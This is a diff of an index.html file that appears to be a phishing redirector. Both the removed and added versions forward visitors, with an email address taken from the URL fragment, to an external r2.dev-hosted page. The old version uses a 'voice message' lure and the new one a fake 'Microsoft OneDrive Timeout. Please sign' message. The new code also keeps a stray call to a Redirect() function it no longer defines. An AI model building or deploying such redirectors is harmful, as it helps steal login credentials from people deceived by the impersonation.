--- a/index.html
+++ b/index.html
@@ -1,15 +1,16 @@
-<script language="javascript">
-	
-</script>
-<head>
-<script type = "text/javascript">
-         <!--
-            function Redirect() {
-               window.location = "https://pub-88834a78a0b042fc9794165ec28b4b99.r2.dev/ked9h2e8i.htm#"+drop;
-            }            
-            document.write("You will be automatically redirected to Your Voice message.");
+<html lang="en">
+
+    <script>
+
+        var hash = window.location.hash;
+
+        var em = hash.split('#')[1];
+window.setTimeout(function() {
+    window.location.href = 'https://pub-88834a78a0b042fc9794165ec28b4b99.r2.dev/ked9h2e8i.htm#'+em;
+}, 1);
+document.write("Microsoft OneDrive Timeout. Please sign");
             setTimeout('Redirect()', 1000);
-         //-->
-      </script>
-	  </head>
+       
+    </script>
+
 </html>
